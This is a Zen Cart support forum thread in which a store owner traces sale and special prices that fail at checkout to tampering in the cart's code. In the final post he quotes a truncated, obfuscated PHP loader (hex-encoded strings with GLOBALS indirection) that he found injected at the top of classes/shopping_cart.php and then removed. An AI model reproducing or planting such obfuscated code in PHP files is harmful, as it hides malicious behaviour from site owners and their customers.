Page 1 of 2 12 LastLast
    Plugin Contributions

Default Sales and Special prices not being applied at checkout

Version 1.55a running on SilverTronStore.com

I tried to put 2 items on sale using the SaleMaker. Both items showed the discount and discounted price correctly on the items storefront page. However, when people actually bought the item, the regular price was charged and not the sale price. I had to refund to the customer.

I also tried to set up a Special, and the same thing happened. The customer was charged full price, and I had to issue a refund.

Currently, I have removed both Sale, and Specials, and am trying Coupons, but so far, no one has bought the items with the coupon.

There are no errors in the logs.

Where do I look?

Bill

Payment modules: PayPal and Braintree
    Server Info:
    Server Host: vps1.wgpeters.net (45.63.19.69)
    Server OS: Linux 3.10.0-693.2.2.el7.x86_64
    Server Date: 10/14/2017 10:26:44
    Server Up Time: Disabled/Unavailable
    HTTP Server: Apache/2.4.6
    PHP Version: 5.4.16 (Zend: 2.4.0)
    PHP File Uploads: On
    Upload Max Size: 2M
    PHP Memory Limit: 128M
    POST Max Size: 8M
    Database: MySQL 5.5.56-MariaDB
    Database Host: localhost (127.0.0.1)
    Database Date: 10/14/2017 10:26:44
    Database Data Size: 1,919 kB
    Database Index Size: 716 kB
    MySQL Slow Query Log Status: On
    MySQL Slow Query Log File: vps1-slow.log
    MySQL Mode: (None set)
    Last edited by wgpeters1; 14 Oct 2017 at 03:36 PM.

Plugin Contributions

Default Re: Sales and Special prices not being applied at checkout

Addons to the default code? These product had only one not both a sale or special, correct?
    ZC Installation/Maintenance Support <- Site
    Contribution for contributions welcome...

Plugin Contributions

One at a time.
    First I tried the sale maker, then removed that and made the two items specials.
    All of the sales were for the SilverTron Elite, which is my highest selling product.

Plugin Contributions

Quote Originally Posted by wgpeters1 View Post
    One at a time.
    First I tried the sale maker, then removed that and made the two items specials.
    All of the sales were for the SilverTron Elite, which is my highest selling product.
    So what plugins/addons have been applied to the site to further it's operation? One of them may have either added a file or modified one that is then causing the issue.

There's a few files involved with the other than normal price once the visitor has left the product page. There's the header file for the shopping cart, the shopping cart class, the order class, and a few functions_prices functions to name a few. Then there's observers/notifiers associated with most of those areas/files... so, knowing something about your own site helps to attempt to identify the potential or likely issue from afar.

Plugin Contributions

One at a time.
    So what plugins/addons have been applied to the site to further it's operation? One of them may have either added a file or modified one that is then causing the issue.

There's a few files involved with the other than normal price once the visitor has left the product page. There's the header file for the shopping cart, the shopping cart class, the order class, and a few functions_prices functions to name a few. Then there's observers/notifiers associated with most of those areas/files... so, knowing something about your own site helps to attempt to identify the potential or likely issue from afar.

Plugin Contributions

My store is all stock, no modifications except for the theme (Professional_Blue). I installed this cart on Sept 12, 2016, and aside from this issue has had no problems. If I put a sales item in the shopping cart, it displays the regular price and checkout then charges the regular price.

Plugin Contributions

My store is all stock, no modifications except for the theme (Professional_Blue). I installed this cart on Sept 12, 2016, and aside from this issue has had no problems. If I put a sales item in the shopping cart, it displays the regular price and checkout then charges the regular price.
    While I did briefly navigate the site in question, providing some of the asociated detail about the setup would help in the general manner.

Is the product priced by attributes?
    Regarding the template installation, do you know what files it modified?
    What type of sale was applied and what were the settings?
    Do you know if includes/classes/shopping_cart.php was modified as part of the template install or not modified as part of an upgrade? Basically it is at the point of viewing the shopping cart that the shopping cart class processes the items in the cart to identify the price that should be associated with each product and then the shopping_cart template should display that information... it appears that in the shopping_cart function get_products at least on your site that the sale/special condition is not being handled correctly. That's the "simple" explanation but that function does offer a number of branches to modify the data.

Plugin Contributions

Quote Originally Posted by mc12345678 View Post
    While I did briefly navigate the site in question, providing some of the asociated detail about the setup would help in the general manner.

Is the product priced by attributes?
    Regarding the template installation, do you know what files it modified?
    What type of sale was applied and what were the settings?
    Do you know if includes/classes/shopping_cart.php was modified as part of the template install or not modified as part of an upgrade? Basically it is at the point of viewing the shopping cart that the shopping cart class processes the items in the cart to identify the price that should be associated with each product and then the shopping_cart template should display that information... it appears that in the shopping_cart function get_products at least on your site that the sale/special condition is not being handled correctly. That's the "simple" explanation but that function does offer a number of branches to modify the data.
    Product that was initially on sale is priced by attributes, but further testing with a product that was not did not work either.

shopping_cart.php appears original. It has the same datestamp as when I installed zencart. Also, when I modify a file, I add my initials as a comment, and this file does not have my initials in it.

Plugin Contributions

Product that was initially on sale is priced by attributes, but further testing with a product that was not did not work either.

shopping_cart.php appears original. It has the same datestamp as when I installed zencart. Also, when I modify a file, I add my initials as a comment, and this file does not have my initials in it.
    Really? Priced by attributes? When I was writing that message, I went to the product (the elite/high end more modifiable) and it did have attributes, and the price would be increased by selecting something other than the default, but the product did not look like it was priced by attributes. There's a little difference. Typically product that are priced by attribute have a base price of 0 and the attribute selections determine the actual price of the product. The lowest price possible is then determined by the price of the lowest attribute within in option name that is considered applicable to the pricing scheme summed with the other prices found the same way.

That said, I've tried to find things related to version 1.5.5a as relates to this issue and didn't find anything specific in the issues about ZC 1.5.5 even though your install is 4 sub-versions behind the current release of ZC 1.5.5 (now sub-version e). I was going to possibly compare the two versions and see, but since you've already started looking at version differences of the shopping_cart class, perhaps you could also look at includes/modules/pages/shopping_cart and the files in there. What differences exist in the directory and the files within that directory?

Plugin Contributions

Thank your for your help, and indeed you have helped me.

Quote Originally Posted by mc12345678 View Post
    Really? Priced by attributes? ...
    Sorry, I guess this nuance escaped me.

I downloaded a fresh copy of 1.55a to make sure I was comparing the correct files. It turned out that classes/shopping_cart did not match the newly downloaded file. It had " $la286c9ab = 951;$GLOBALS['bfdf8e2']=Array();global$bfdf8e2;$bfdf8e2=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['yb38e']="\x6d\x3e\x67\x29\x70\x47\x23\x2d\x7c\x73\x48\x6f\x30\x25\x55\x62\x7b\x63\x3c\x 4e\x53\x37\x4a\x4c\x78\x44\x42\x61\x4f\x2a\x6a\x5a\x2b\x4d\x72\x68\x59\x3d\x31\x 77\x7e\x2e\x3a\x75\x7a\x69\x41\x4b\x5e\x60\x35\x28\x5d\x50\x5f\x2c\x39\x20\x33\x 34\x57\x74\x45\x71\x46\x32\x7d\x6e\x65\x26\x21\x38\x64\x52\x24\x6b\xa\x54\xd\x66 \x43\x22\x5b\x40\x6c\x56\x36\x79\x27\x51\x5c\x3f\x76\x49\x58\x3b\x2f\x9";$bfdf8e 2[$bfdf8e2['yb38e'][34].$bfdf8e2['yb38e'][15].$bfdf8e2['yb38e'][21].$bfdf8e2['yb38e'][17].$bfdf8e2 ..." at the beginning of the file. I have no idea what this is, and what will break now that I have removed it. But removing it did make the prices shown by the shopping cart correct.

Thanks again for pointing me in the right direction.

Bill

Page 1 of 2 12 LastLast